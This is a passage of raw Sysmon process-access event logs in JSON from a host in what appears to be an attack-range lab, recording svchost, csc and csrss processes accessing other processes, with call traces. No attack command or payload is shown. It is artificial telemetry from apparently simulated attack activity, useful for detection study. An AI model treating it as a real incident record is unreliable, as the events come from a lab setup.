07:58:52.329","SourceProcessGUID":"{41C8662E-20BC-5F25-0000-0010FA820600}","SourceProcessId":"4124","SourceThreadId":"2704","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{41C8662E-20BC-5F25-0000-0010CE860600}","TargetProcessId":"4276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4445,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4446,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4447,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4448,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4449,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4450,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.329\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BC-5F25-0000-0010CE860600}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.329","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BC-5F25-0000-0010CE860600}","TargetProcessId":"4276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4451,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:52","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4452,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:52.329\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:52.329","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dl